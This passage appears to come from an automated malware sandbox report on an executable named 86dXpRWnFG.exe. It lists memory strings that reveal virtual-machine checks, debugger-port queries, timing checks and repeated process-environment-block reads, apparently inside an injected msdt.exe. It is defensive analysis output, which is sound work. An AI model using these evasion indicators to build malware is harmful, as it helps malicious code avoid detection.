          Source: explorer.exe, 0000000A.00000000.757122057.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.763244737.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 0000000A.00000000.757122057.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000A.00000000.763244737.000000000A716000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA^
          Source: explorer.exe, 0000000A.00000000.763244737.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 0000000A.00000000.757122057.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_00409A90 rdtsc 9_2_00409A90
          Source: C:\Users\user\Desktop\86dXpRWnFG.exeCode function: 9_2_0040ACD0 LdrLoadDll,9_2_0040ACD0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05353D34 mov eax, dword ptr fs:[00000030h]14_2_05353D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534AD30 mov eax, dword ptr fs:[00000030h]14_2_0534AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053CA537 mov eax, dword ptr fs:[00000030h]14_2_053CA537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374D3B mov eax, dword ptr fs:[00000030h]14_2_05374D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374D3B mov eax, dword ptr fs:[00000030h]14_2_05374D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05374D3B mov eax, dword ptr fs:[00000030h]14_2_05374D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536C577 mov eax, dword ptr fs:[00000030h]14_2_0536C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536C577 mov eax, dword ptr fs:[00000030h]14_2_0536C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05367D50 mov eax, dword ptr fs:[00000030h]14_2_05367D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418D34 mov eax, dword ptr fs:[00000030h]14_2_05418D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540E539 mov eax, dword ptr fs:[00000030h]14_2_0540E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05383D43 mov eax, dword ptr fs:[00000030h]14_2_05383D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C3540 mov eax, dword ptr fs:[00000030h]14_2_053C3540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05371DB5 mov eax, dword ptr fs:[00000030h]14_2_05371DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05371DB5 mov eax, dword ptr fs:[00000030h]14_2_05371DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05371DB5 mov eax, dword ptr fs:[00000030h]14_2_05371DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053735A1 mov eax, dword ptr fs:[00000030h]14_2_053735A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540FDE2 mov eax, dword ptr fs:[00000030h]14_2_0540FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540FDE2 mov eax, dword ptr fs:[00000030h]14_2_0540FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540FDE2 mov eax, dword ptr fs:[00000030h]14_2_0540FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540FDE2 mov eax, dword ptr fs:[00000030h]14_2_0540FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537FD9B mov eax, dword ptr fs:[00000030h]14_2_0537FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537FD9B mov eax, dword ptr fs:[00000030h]14_2_0537FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372581 mov eax, dword ptr fs:[00000030h]14_2_05372581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372581 mov eax, dword ptr fs:[00000030h]14_2_05372581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372581 mov eax, dword ptr fs:[00000030h]14_2_05372581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372581 mov eax, dword ptr fs:[00000030h]14_2_05372581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05342D8A mov eax, dword ptr fs:[00000030h]14_2_05342D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05342D8A mov eax, dword ptr fs:[00000030h]14_2_05342D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05342D8A mov eax, dword ptr fs:[00000030h]14_2_05342D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05342D8A mov eax, dword ptr fs:[00000030h]14_2_05342D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05342D8A mov eax, dword ptr fs:[00000030h]14_2_05342D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053F8DF1 mov eax, dword ptr fs:[00000030h]14_2_053F8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535D5E0 mov eax, dword ptr fs:[00000030h]14_2_0535D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535D5E0 mov eax, dword ptr fs:[00000030h]14_2_0535D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054105AC mov eax, dword ptr fs:[00000030h]14_2_054105AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054105AC mov eax, dword ptr fs:[00000030h]14_2_054105AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov eax, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov eax, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov eax, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov ecx, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov eax, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6DC9 mov eax, dword ptr fs:[00000030h]14_2_053C6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537BC2C mov eax, dword ptr fs:[00000030h]14_2_0537BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6C0A mov eax, dword ptr fs:[00000030h]14_2_053C6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6C0A mov eax, dword ptr fs:[00000030h]14_2_053C6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6C0A mov eax, dword ptr fs:[00000030h]14_2_053C6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6C0A mov eax, dword ptr fs:[00000030h]14_2_053C6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401C06 mov eax, dword ptr fs:[00000030h]14_2_05401C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541740D mov eax, dword ptr fs:[00000030h]14_2_0541740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541740D mov eax, dword ptr fs:[00000030h]14_2_0541740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541740D mov eax, dword ptr fs:[00000030h]14_2_0541740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536746D mov eax, dword ptr fs:[00000030h]14_2_0536746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DC450 mov eax, dword ptr fs:[00000030h]14_2_053DC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DC450 mov eax, dword ptr fs:[00000030h]14_2_053DC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A44B mov eax, dword ptr fs:[00000030h]14_2_0537A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418CD6 mov eax, dword ptr fs:[00000030h]14_2_05418CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535849B mov eax, dword ptr fs:[00000030h]14_2_0535849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_054014FB mov eax, dword ptr fs:[00000030h]14_2_054014FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6CF0 mov eax, dword ptr fs:[00000030h]14_2_053C6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6CF0 mov eax, dword ptr fs:[00000030h]14_2_053C6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C6CF0 mov eax, dword ptr fs:[00000030h]14_2_053C6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537E730 mov eax, dword ptr fs:[00000030h]14_2_0537E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05344F2E mov eax, dword ptr fs:[00000030h]14_2_05344F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05344F2E mov eax, dword ptr fs:[00000030h]14_2_05344F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536F716 mov eax, dword ptr fs:[00000030h]14_2_0536F716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418F6A mov eax, dword ptr fs:[00000030h]14_2_05418F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DFF10 mov eax, dword ptr fs:[00000030h]14_2_053DFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DFF10 mov eax, dword ptr fs:[00000030h]14_2_053DFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A70E mov eax, dword ptr fs:[00000030h]14_2_0537A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A70E mov eax, dword ptr fs:[00000030h]14_2_0537A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541070D mov eax, dword ptr fs:[00000030h]14_2_0541070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0541070D mov eax, dword ptr fs:[00000030h]14_2_0541070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535FF60 mov eax, dword ptr fs:[00000030h]14_2_0535FF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535EF40 mov eax, dword ptr fs:[00000030h]14_2_0535EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05358794 mov eax, dword ptr fs:[00000030h]14_2_05358794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7794 mov eax, dword ptr fs:[00000030h]14_2_053C7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7794 mov eax, dword ptr fs:[00000030h]14_2_053C7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7794 mov eax, dword ptr fs:[00000030h]14_2_053C7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053837F5 mov eax, dword ptr fs:[00000030h]14_2_053837F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053FFE3F mov eax, dword ptr fs:[00000030h]14_2_053FFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540AE44 mov eax, dword ptr fs:[00000030h]14_2_0540AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0540AE44 mov eax, dword ptr fs:[00000030h]14_2_0540AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534E620 mov eax, dword ptr fs:[00000030h]14_2_0534E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A61C mov eax, dword ptr fs:[00000030h]14_2_0537A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A61C mov eax, dword ptr fs:[00000030h]14_2_0537A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534C600 mov eax, dword ptr fs:[00000030h]14_2_0534C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534C600 mov eax, dword ptr fs:[00000030h]14_2_0534C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534C600 mov eax, dword ptr fs:[00000030h]14_2_0534C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05378E00 mov eax, dword ptr fs:[00000030h]14_2_05378E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536AE73 mov eax, dword ptr fs:[00000030h]14_2_0536AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536AE73 mov eax, dword ptr fs:[00000030h]14_2_0536AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536AE73 mov eax, dword ptr fs:[00000030h]14_2_0536AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536AE73 mov eax, dword ptr fs:[00000030h]14_2_0536AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536AE73 mov eax, dword ptr fs:[00000030h]14_2_0536AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05401608 mov eax, dword ptr fs:[00000030h]14_2_05401608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535766D mov eax, dword ptr fs:[00000030h]14_2_0535766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05357E41 mov eax, dword ptr fs:[00000030h]14_2_05357E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418ED6 mov eax, dword ptr fs:[00000030h]14_2_05418ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C46A7 mov eax, dword ptr fs:[00000030h]14_2_053C46A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DFE87 mov eax, dword ptr fs:[00000030h]14_2_053DFE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053716E0 mov ecx, dword ptr fs:[00000030h]14_2_053716E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053576E2 mov eax, dword ptr fs:[00000030h]14_2_053576E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05410EA5 mov eax, dword ptr fs:[00000030h]14_2_05410EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05410EA5 mov eax, dword ptr fs:[00000030h]14_2_05410EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05410EA5 mov eax, dword ptr fs:[00000030h]14_2_05410EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053736CC mov eax, dword ptr fs:[00000030h]14_2_053736CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053FFEC0 mov eax, dword ptr fs:[00000030h]14_2_053FFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05388EC7 mov eax, dword ptr fs:[00000030h]14_2_05388EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537513A mov eax, dword ptr fs:[00000030h]14_2_0537513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537513A mov eax, dword ptr fs:[00000030h]14_2_0537513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05364120 mov eax, dword ptr fs:[00000030h]14_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05364120 mov eax, dword ptr fs:[00000030h]14_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05364120 mov eax, dword ptr fs:[00000030h]14_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05364120 mov eax, dword ptr fs:[00000030h]14_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05364120 mov ecx, dword ptr fs:[00000030h]14_2_05364120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349100 mov eax, dword ptr fs:[00000030h]14_2_05349100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349100 mov eax, dword ptr fs:[00000030h]14_2_05349100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349100 mov eax, dword ptr fs:[00000030h]14_2_05349100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534B171 mov eax, dword ptr fs:[00000030h]14_2_0534B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534B171 mov eax, dword ptr fs:[00000030h]14_2_0534B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534C962 mov eax, dword ptr fs:[00000030h]14_2_0534C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536B944 mov eax, dword ptr fs:[00000030h]14_2_0536B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536B944 mov eax, dword ptr fs:[00000030h]14_2_0536B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C51BE mov eax, dword ptr fs:[00000030h]14_2_053C51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C51BE mov eax, dword ptr fs:[00000030h]14_2_053C51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C51BE mov eax, dword ptr fs:[00000030h]14_2_053C51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C51BE mov eax, dword ptr fs:[00000030h]14_2_053C51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053761A0 mov eax, dword ptr fs:[00000030h]14_2_053761A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053761A0 mov eax, dword ptr fs:[00000030h]14_2_053761A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C69A6 mov eax, dword ptr fs:[00000030h]14_2_053C69A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05372990 mov eax, dword ptr fs:[00000030h]14_2_05372990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537A185 mov eax, dword ptr fs:[00000030h]14_2_0537A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0536C182 mov eax, dword ptr fs:[00000030h]14_2_0536C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053D41E8 mov eax, dword ptr fs:[00000030h]14_2_053D41E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534B1E1 mov eax, dword ptr fs:[00000030h]14_2_0534B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534B1E1 mov eax, dword ptr fs:[00000030h]14_2_0534B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0534B1E1 mov eax, dword ptr fs:[00000030h]14_2_0534B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537002D mov eax, dword ptr fs:[00000030h]14_2_0537002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537002D mov eax, dword ptr fs:[00000030h]14_2_0537002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537002D mov eax, dword ptr fs:[00000030h]14_2_0537002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537002D mov eax, dword ptr fs:[00000030h]14_2_0537002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537002D mov eax, dword ptr fs:[00000030h]14_2_0537002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535B02A mov eax, dword ptr fs:[00000030h]14_2_0535B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535B02A mov eax, dword ptr fs:[00000030h]14_2_0535B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535B02A mov eax, dword ptr fs:[00000030h]14_2_0535B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0535B02A mov eax, dword ptr fs:[00000030h]14_2_0535B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7016 mov eax, dword ptr fs:[00000030h]14_2_053C7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7016 mov eax, dword ptr fs:[00000030h]14_2_053C7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C7016 mov eax, dword ptr fs:[00000030h]14_2_053C7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05402073 mov eax, dword ptr fs:[00000030h]14_2_05402073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05411074 mov eax, dword ptr fs:[00000030h]14_2_05411074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05414015 mov eax, dword ptr fs:[00000030h]14_2_05414015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05414015 mov eax, dword ptr fs:[00000030h]14_2_05414015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05360050 mov eax, dword ptr fs:[00000030h]14_2_05360050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05360050 mov eax, dword ptr fs:[00000030h]14_2_05360050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537F0BF mov ecx, dword ptr fs:[00000030h]14_2_0537F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537F0BF mov eax, dword ptr fs:[00000030h]14_2_0537F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0537F0BF mov eax, dword ptr fs:[00000030h]14_2_0537F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053890AF mov eax, dword ptr fs:[00000030h]14_2_053890AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053720A0 mov eax, dword ptr fs:[00000030h]14_2_053720A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05349080 mov eax, dword ptr fs:[00000030h]14_2_05349080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C3884 mov eax, dword ptr fs:[00000030h]14_2_053C3884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053C3884 mov eax, dword ptr fs:[00000030h]14_2_053C3884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053440E1 mov eax, dword ptr fs:[00000030h]14_2_053440E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053440E1 mov eax, dword ptr fs:[00000030h]14_2_053440E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053440E1 mov eax, dword ptr fs:[00000030h]14_2_053440E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053458EC mov eax, dword ptr fs:[00000030h]14_2_053458EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov eax, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov ecx, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov eax, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov eax, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov eax, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_053DB8D0 mov eax, dword ptr fs:[00000030h]14_2_053DB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05418B58 mov eax, dword ptr fs:[00000030h]14_2_05418B58
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05373B7A mov eax, dword ptr fs:[00000030h]14_2_05373B7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_05373B7A mov eax, dword ptr fs:[00000030h]14_2_05373B7A
